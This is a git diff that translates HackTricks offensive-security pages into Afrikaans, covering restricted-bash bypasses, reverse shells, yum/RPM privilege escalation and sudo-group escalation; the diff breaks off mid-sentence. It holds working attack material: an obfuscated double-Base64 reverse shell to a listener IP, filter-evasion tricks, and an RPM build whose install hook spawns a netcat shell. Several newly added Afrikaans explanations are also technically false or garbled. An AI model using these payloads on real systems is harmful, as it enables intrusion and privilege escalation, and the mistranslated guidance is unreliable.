Wys inligting oor die beskikbare diskruimte. +- `du`: Wys die grootte van 'n lêer of gids. +- `history`: Wys die geskiedenis van uitgevoerde opdragte. + +### Tegnieke + +- **Pyp**: Gebruik die `|`-teken om die uitset van die een opdrag as die inset van 'n ander opdrag te gebruik. Byvoorbeeld: `ls -l | grep .txt` sal alle lêers met die `.txt`-uitbreiding in die huidige gids wys. +- **Redirigeer**: Gebruik die `>`-teken om die uitset van 'n opdrag na 'n lêer te stuur. Byvoorbeeld: `ls > lêers.txt` sal die inhoud van die huidige gids na 'n lêer met die naam `lêers.txt` skryf. +- **Agtergrond**: Voeg die `&`-teken by die einde van 'n opdrag om dit in die agtergrond uit te voer. Byvoorbeeld: `ping google.com &` sal die `ping`-opdrag in die agtergrond uitvoer en jou die beheer oor die skulpry teruggee. +- **Vars**: Gebruik die `$`-teken om die waarde van 'n veranderlike op te roep. Byvoorbeeld: `echo $HOME` sal die pad van jou tuisgids afdruk. +- **Lusse**: Gebruik die `for`- of `while`-opdragte om herhalende take uit te voer. Byvoorbeeld: `for i in {1..5}; do echo $i; done` sal die getalle 1 tot 5 afdruk. + +Met hierdie opdragte en tegnieke kan jy jou Linux-stelsel effektief bestuur en beveilig. ```bash #All bytes inside a file (except 0x20 and 0x00) for j in $((for i in {0..9}{0..9} {0..9}{a..f} {a..f}{0..9} {a..f}{a..f}; do echo $i; done ) | sort | grep -v "20\|00"); do echo -n -e "\x$j" >> bytes; done ``` - ## Iptables +Iptables is 'n kragtige hulpmiddel wat gebruik word vir die konfigurasie van die firewall in Linux-stelsels. Dit stel gebruikers in staat om verkeer te beheer deur middel van verskillende reëls en beleide. Hier is 'n paar nuttige opdragte wat met iptables gebruik kan word: + +### Opdragte + +- `iptables -L`: Gee 'n lys van alle huidige iptables-reëls. +- `iptables -F`: Vee alle huidige iptables-reëls skoon. +- `iptables -A -p --dport -j `: Voeg 'n nuwe reël by die gespesifiseerde ketting. Die `` parameter verwys na die ketting waarin die reël geplaas moet word, `` verwys na die protokol van die verkeer (byvoorbeeld tcp of udp), `` verwys na die poortnommer en `` verwys na die aksie wat geneem moet word (byvoorbeeld ACCEPT, DROP of REJECT). +- `iptables -D `: Verwyder die gespesifiseerde reël uit die ketting. +- `iptables -P `: Stel die verstekbeleid in vir die gespesifiseerde ketting. Die `` parameter kan ingestel word as ACCEPT, DROP of REJECT. + +### Voorbeelde + +- `iptables -A INPUT -p tcp --dport 22 -j ACCEPT`: Voeg 'n reël by die INPUT-ketting om inkomende TCP-verkeer op poort 22 toe te laat. +- `iptables -A INPUT -p tcp --dport 80 -j DROP`: Voeg 'n reël by die INPUT-ketting om inkomende TCP-verkeer op poort 80 te blokkeer. +- `iptables -A OUTPUT -p udp --dport 53 -j ACCEPT`: Voeg 'n reël by die OUTPUT-ketting om uitgaande UDP-verkeer op poort 53 toe te laat. + +Dit is slegs 'n paar voorbeelde van die gebruik van iptables. Daar is baie meer funksies en opsies beskikbaar wat dit 'n kragtige instrument maak vir die beheer van verkeer in Linux-stelsels. ```bash #Delete curent rules and chains iptables --flush @@ -334,25 +656,24 @@ iptables -P INPUT DROP iptables -P FORWARD ACCEPT iptables -P OUTPUT ACCEPT ``` -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslag.
\ -Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: +Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik en **outomatiese werksvloeie** te bou met behulp van die wêreld se **mees gevorderde** gemeenskapsinstrumente.\ +Kry vandag toegang: {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} diff --git a/linux-hardening/useful-linux-commands/bypass-bash-restrictions.md b/linux-hardening/useful-linux-commands/bypass-bash-restrictions.md index 44c69dedd..727b52d81 100644 --- a/linux-hardening/useful-linux-commands/bypass-bash-restrictions.md +++ b/linux-hardening/useful-linux-commands/bypass-bash-restrictions.md @@ -1,39 +1,46 @@ -# Bypass Linux Restrictions +# Omseil Linux Beperkings
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
\ -Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: +Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik **werkstrome** te bou en outomatiseer met behulp van die wêreld se **mees gevorderde** gemeenskapsinstrumente.\ +Kry vandag toegang: {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} -## Common Limitations Bypasses - -### Reverse Shell +## Algemene Beperkings Omseilings +### Omgekeerde Skulp ```bash # Double-Base64 is a great way to avoid bad characters like +, works 99% of the time echo "echo $(echo 'bash -i >& /dev/tcp/10.10.14.8/4444 0>&1' | base64 | base64)|ba''se''6''4 -''d|ba''se''64 -''d|b''a''s''h" | sed 's/ /${IFS}/g' # echo${IFS}WW1GemFDQXRhU0ErSmlBdlpHVjJMM1JqY0M4eE1DNHhNQzR4TkM0NEx6UTBORFFnTUQ0bU1Rbz0K|ba''se''6''4${IFS}-''d|ba''se''64${IFS}-''d|b''a''s''h ``` +### Kort Rev shell -### Short Rev shell +Hierdie is 'n kort rev shell wat gebruik kan word om 'n verbinding met 'n bediener te maak en beheer oor die doelwitstelsel te verkry. +```bash +bash -i >& /dev/tcp// 0>&1 +``` + +Vervang `` met die IP-adres van die bediener en `` met die poortnommer waarop die bediener luister. + +Hierdie bevel sal 'n interaktiewe bash-sessie skep wat deur die bediener beheer word. Dit stuur die standaard in- en uitvoer na die gespesifiseerde IP-adres en poort. ```bash #Trick from Dikline #Get a rev shell with @@ -41,9 +48,49 @@ echo "echo $(echo 'bash -i >& /dev/tcp/10.10.14.8/4444 0>&1' | base64 | base64)| #Then get the out of the rev shell executing inside of it: exec >&0 ``` +### Deurweeg Paaie en verbode woorde -### Bypass Paths and forbidden words +Om beperkings in Bash te omseil, kan jy verskeie paaie en verbode woorde gebruik. Hier is 'n paar tegnieke wat jy kan gebruik: +#### 1. Gebruik van absolute paaie + +In plaas van relatiewe paaie te gebruik, kan jy absolute paaie gebruik om beperkings te omseil. Byvoorbeeld, as die relatiewe pad `/bin/ls` verbode is, kan jy die absolute pad `/usr/bin/ls` gebruik om die `ls`-opdrag uit te voer. + +#### 2. Gebruik van omgekeerde skakels + +Om beperkings te omseil, kan jy omgekeerde skakels (`\`) gebruik om spesiale karakters te ontsnap. Byvoorbeeld, as die woord `ls` verbode is, kan jy die opdrag `l\ s` gebruik om dit uit te voer. + +#### 3. Gebruik van alternatiewe opdragname + +As 'n spesifieke opdragnaam verbode is, kan jy 'n alternatiewe opdragnaam gebruik om die beperking te omseil. Byvoorbeeld, as die opdrag `ls` verbode is, kan jy die opdrag `dir` gebruik om dieselfde funksionaliteit te verkry. + +#### 4. Gebruik van omgekeerde skakels in opdragname + +Om beperkings te omseil, kan jy omgekeerde skakels (`\`) gebruik in die opdragnaam self. Byvoorbeeld, as die opdragnaam `ls` verbode is, kan jy die opdragnaam `l\ s` gebruik om dit uit te voer. + +#### 5. Gebruik van omgekeerde skakels in padname + +Om beperkings te omseil, kan jy omgekeerde skakels (`\`) gebruik in die padnaam self. Byvoorbeeld, as die pad `/bin/ls` verbode is, kan jy die pad `/b\ in/ls` gebruik om die `ls`-opdrag uit te voer. + +#### 6. Gebruik van omgekeerde skakels in argumente + +Om beperkings te omseil, kan jy omgekeerde skakels (`\`) gebruik in die argumente van 'n opdrag. Byvoorbeeld, as die argument `file.txt` verbode is, kan jy die argument `file.t\ xt` gebruik om dit te omseil. + +#### 7. Gebruik van omgekeerde skakels in omgewingsveranderlikes + +Om beperkings te omseil, kan jy omgekeerde skakels (`\`) gebruik in omgewingsveranderlikes. Byvoorbeeld, as die omgewingsveranderlike `PATH` verbode karakters bevat, kan jy omgekeerde skakels gebruik om die karakters te ontsnap. + +#### 8. Gebruik van wildcards + +Om beperkings te omseil, kan jy wildcards gebruik om opdragte uit te voer. Byvoorbeeld, as die opdrag `ls` verbode is, kan jy die opdrag `l*s` gebruik om dit uit te voer. + +#### 9. Gebruik van alternatiewe opdraguitvoerders + +As 'n spesifieke opdraguitvoerder verbode is, kan jy 'n alternatiewe opdraguitvoerder gebruik om die beperking te omseil. Byvoorbeeld, as die opdraguitvoerder `/bin/bash` verbode is, kan jy die opdraguitvoerder `/bin/sh` gebruik om dieselfde funksionaliteit te verkry. + +#### 10. Gebruik van omgekeerde skakels in opdraguitvoerder + +Om beperkings te omseil, kan jy omgekeerde skakels (`\`) gebruik in die opdraguitvoerder self. Byvoorbeeld, as die opdraguitvoerder `/bin/bash` verbode is, kan jy die opdraguitvoerder `/bin/b\ ash` gebruik om dit uit te voer. ```bash # Question mark binary substitution /usr/bin/p?ng # /usr/bin/ping @@ -98,9 +145,17 @@ mi # This will throw an error whoa # This will throw an error !-1!-2 # This will execute whoami ``` +### Bypass verbode spasies -### Bypass forbidden spaces +Hier is 'n paar tegnieke om verbode spasies in 'n opdrag te omseil: +1. Gebruik enkele aanhalingstekens: As jy enkele aanhalingstekens gebruik, sal die opdrag die spasie ignoreer en die res van die teks as een argument beskou. Byvoorbeeld: `ls' -la` sal die opdrag `ls -la` uitvoer. + +2. Gebruik backslashes: Deur 'n backslash voor die spasie te plaas, sal die spasie geïgnoreer word en die opdrag korrek uitgevoer word. Byvoorbeeld: `ls\ -la` sal dieselfde resultaat gee as `ls -la`. + +3. Gebruik dubbele aanhalingstekens: Dubbele aanhalingstekens kan gebruik word om die spasie te omhul en dit as een argument te beskou. Byvoorbeeld: `"ls -la"` sal dieselfde resultaat gee as `ls -la`. + +Dit is belangrik om te onthou dat hierdie tegnieke slegs werk vir opdragreëls wat deur die Bash-skootrekenaar geïnterpreteer word. Ander skootrekenaars kan verskillende sintaksis vereis. ```bash # {form} {cat,lol.txt} # cat lol.txt @@ -133,22 +188,110 @@ g # These 4 lines will equal to ping $u $u # This will be saved in the history and can be used as a space, please notice that the $u variable is undefined uname!-1\-a # This equals to uname -a ``` +### Bypass rugsteek en sny -### Bypass backslash and slash +Hier is 'n paar tegnieke om rugsteek en sny beperkings in Linux te omseil: +#### Gebruik enkele aanhalingstekens + +As jy enkele aanhalingstekens gebruik in plaas van dubbele aanhalingstekens, sal die rugsteek en sny beperkings omseil word. Byvoorbeeld: + +```bash +echo 'Hello World' +``` + +#### Gebruik die `eval`-opdrag + +Die `eval`-opdrag kan gebruik word om die rugsteek en sny beperkings te omseil. Byvoorbeeld: + +```bash +eval echo Hello\ World +``` + +#### Gebruik die `printf`-opdrag + +Die `printf`-opdrag kan ook gebruik word om die rugsteek en sny beperkings te omseil. Byvoorbeeld: + +```bash +printf "Hello World\n" +``` + +#### Gebruik die `echo -e`-opdrag + +Die `echo -e`-opdrag kan gebruik word om die rugsteek en sny beperkings te omseil. Byvoorbeeld: + +```bash +echo -e "Hello\tWorld" +``` + +#### Gebruik die `echo $'...'`-notasie + +Die `echo $'...'`-notasie kan gebruik word om die rugsteek en sny beperkings te omseil. Byvoorbeeld: + +```bash +echo $'Hello\tWorld' +``` + +#### Gebruik die `cat`-opdrag + +Die `cat`-opdrag kan gebruik word om die rugsteek en sny beperkings te omseil. Byvoorbeeld: + +```bash +cat < mypipe & +opdrag2 < mypipe +``` + +In hierdie voorbeeld word 'n benoemde pyp met die naam `mypipe` geskep. Die uitvoer van `opdrag1` word na die pyp gestuur met behulp van die `>`-operateur. Die `&`-teken word gebruik om die proses in die agtergrond te plaas. Die `opdrag2` lees dan die data van die pyp met behulp van die `<`-operateur. + +Hierdie tegniek kan gebruik word om pype te skep sonder om die beperkings van die opdragskulp te omseil. + +#### 3. Gebruik van `socat` + +`socat` is 'n nuttige hulpmiddel wat gebruik kan word om data tussen verskillende strome te stuur. Jy kan dit gebruik om pype te skep en data tussen hulle te stuur. Hier is 'n voorbeeld van hoe jy dit kan doen: + +```bash +socat -u EXEC:"opdrag1",pty STDIO | opdrag2 +``` + +In hierdie voorbeeld word `socat` gebruik om 'n pyp te skep tussen `opdrag1` en `opdrag2`. Die `-u`-vlag word gebruik om die data onmiddellik te stuur sonder buffering. Die `EXEC`-opdragspesifikasie word gebruik om `opdrag1` uit te voer en die uitvoer daarvan na die pyp te stuur. Die `pty`-vlag word gebruik om 'n virtuele teletipe te skep. Die `STDIO`-vlag word gebruik om die data na die standaard invoer van `opdrag2` te stuur. + +Hierdie tegniek maak dit moontlik om pype te gebruik sonder om die beperkings van die opdragskulp te omseil. ```bash bash<<<$(base64 -d<<g` in a file @@ -346,22 +619,21 @@ ln /f* 'sh x' 'sh g' ``` +## Lees-Alleen/Geen Uitvoering/Beperkte Bash-Omzeiling -## Read-Only/Noexec/Distroless Bypass - -If you are inside a filesystem with the **read-only and noexec protections** or even in a distroless container, there are still ways to **execute arbitrary binaries, even a shell!:** +As jy binne 'n lêersisteem met die **lees-alleen en geen-uitvoer beskerming** of selfs in 'n distrolose houer is, is daar steeds maniere om **arbitrêre bineêre lêers uit te voer, selfs 'n skul!:** {% content-ref url="../bypass-bash-restrictions/bypass-fs-protections-read-only-no-exec-distroless/" %} [bypass-fs-protections-read-only-no-exec-distroless](../bypass-bash-restrictions/bypass-fs-protections-read-only-no-exec-distroless/) {% endcontent-ref %} -## Chroot & other Jails Bypass +## Chroot & ander Jails-Omseiling {% content-ref url="../privilege-escalation/escaping-from-limited-bash.md" %} [escaping-from-limited-bash.md](../privilege-escalation/escaping-from-limited-bash.md) {% endcontent-ref %} -## References & More +## Verwysings & Meer * [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection#exploits](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection#exploits) * [https://github.com/Bo0oM/WAF-bypass-Cheat-Sheet](https://github.com/Bo0oM/WAF-bypass-Cheat-Sheet) @@ -371,21 +643,21 @@ If you are inside a filesystem with the **read-only and noexec protections** or
\ -Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: +Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik en outomaties werkstrome te bou wat aangedryf word deur die wêreld se **mees gevorderde** gemeenskapsinstrumente.\ +Kry Vandag Toegang: {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy in HackTricks wil adverteer** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
diff --git a/linux-unix/privilege-escalation/exploiting-yum.md b/linux-unix/privilege-escalation/exploiting-yum.md index 620149dcd..7cb132fe3 100644 --- a/linux-unix/privilege-escalation/exploiting-yum.md +++ b/linux-unix/privilege-escalation/exploiting-yum.md @@ -1,33 +1,30 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
-Further examples around yum can also be found on [gtfobins](https://gtfobins.github.io/gtfobins/yum/). +Verdere voorbeelde rondom yum kan ook gevind word op [gtfobins](https://gtfobins.github.io/gtfobins/yum/). -# Executing arbitrary commands via RPM Packages -## Checking the Environment -In order to leverage this vector the user must be able to execute yum commands as a higher privileged user, i.e. root. +# Uitvoering van willekeurige opdragte via RPM-pakkette +## Kontroleer die omgewing +Om van hierdie vektor gebruik te maak, moet die gebruiker yum-opdragte kan uitvoer as 'n hoërbevoorregte gebruiker, d.w.s. root. -### A working example of this vector -A working example of this exploit can be found in the [daily bugle](https://tryhackme.com/room/dailybugle) room on [tryhackme](https://tryhackme.com). +### 'n Werkende voorbeeld van hierdie vektor +'n Werkende voorbeeld van hierdie uitbuiting kan gevind word in die [daily bugle](https://tryhackme.com/room/dailybugle) kamer op [tryhackme](https://tryhackme.com). -## Packing an RPM -In the following section, I will cover packaging a reverse shell into an RPM using [fpm](https://github.com/jordansissel/fpm). - -The example below creates a package that includes a before-install trigger with an arbitrary script that can be defined by the attacker. When installed, this package will execute the arbitrary command. I've used a simple reverse netcat shell example for demonstration but this can be changed as necessary. +## Verpak 'n RPM +In die volgende afdeling sal ek verpakking van 'n omgekeerde skulp in 'n RPM dek met behulp van [fpm](https://github.com/jordansissel/fpm). +Die voorbeeld hieronder skep 'n pakkie wat 'n voor-installasie-trigger insluit met 'n willekeurige skrips wat deur die aanvaller gedefinieer kan word. Wanneer dit geïnstalleer word, sal hierdie pakkie die willekeurige opdrag uitvoer. Ek het 'n eenvoudige voorbeeld van 'n omgekeerde netcat-skulp gebruik vir demonstrasie, maar dit kan na wense verander word. ```text EXPLOITDIR=$(mktemp -d) CMD='nc -e /bin/bash ' @@ -35,27 +32,24 @@ RPMNAME="exploited" echo $CMD > $EXPLOITDIR/beforeinstall.sh fpm -n $RPMNAME -s dir -t rpm -a all --before-install $EXPLOITDIR/beforeinstall.sh $EXPLOITDIR ``` +# Die vang van 'n skulp +Deur die bogenoemde voorbeeld te gebruik en aan te neem dat `yum` uitgevoer kan word as 'n gebruiker met hoër bevoegdhede. -# Catching a shell -Using the above example and assuming `yum` can be executed as a higher-privileged user. - -1. **Transfer** the rpm to the host -2. **Start** a listener on your local host such as the [example netcat listener](/shells/shells/linux#netcat) -3. **Install** the vulnerable package `yum localinstall -y exploited-1.0-1.noarch.rpm` +1. **Oordra** die rpm na die gasheer. +2. **Begin** 'n luisteraar op jou plaaslike gasheer soos die [voorbeeld netcat luisteraar](/shells/shells/linux#netcat). +3. **Installeer** die kwesbare pakkie `yum localinstall -y exploited-1.0-1.noarch.rpm`
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
- - diff --git a/linux-unix/privilege-escalation/interesting-groups-linux-pe.md b/linux-unix/privilege-escalation/interesting-groups-linux-pe.md index 5de9f3b73..3dcd8b7f0 100644 --- a/linux-unix/privilege-escalation/interesting-groups-linux-pe.md +++ b/linux-unix/privilege-escalation/interesting-groups-linux-pe.md @@ -1,26 +1,23 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling van eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
-# Sudo/Admin Groups +# Sudo/Admin Groepe -## **PE - Method 1** - -**Sometimes**, **by default \(or because some software needs it\)** inside the **/etc/sudoers** file you can find some of these lines: +## **PE - Metode 1** +**Soms**, **standaard \(of omdat sommige sagteware dit nodig het\)** binne die **/etc/sudoers** lêer kan jy van hierdie lyne vind: ```bash # Allow members of group sudo to execute any command %sudo ALL=(ALL:ALL) ALL @@ -28,95 +25,75 @@ Other ways to support HackTricks: # Allow members of group admin to execute any command %admin ALL=(ALL:ALL) ALL ``` +Dit beteken dat **enige gebruiker wat behoort tot die groep sudo of admin enigiets as sudo kan uitvoer**. -This means that **any user that belongs to the group sudo or admin can execute anything as sudo**. - -If this is the case, to **become root you can just execute**: - +Indien dit die geval is, kan jy **root word deur net die volgende uit te voer**: ```text sudo su ``` +## PE - Metode 2 -## PE - Method 2 - -Find all suid binaries and check if there is the binary **Pkexec**: - +Vind alle suid-binêre en kyk of die binêre **Pkexec** daar is: ```bash find / -perm -4000 2>/dev/null ``` - -If you find that the binary pkexec is a SUID binary and you belong to sudo or admin, you could probably execute binaries as sudo using pkexec. -Check the contents of: - +As jy vind dat die binaêre pkexec 'n SUID-binaêre is en jy behoort aan sudo of admin, kan jy 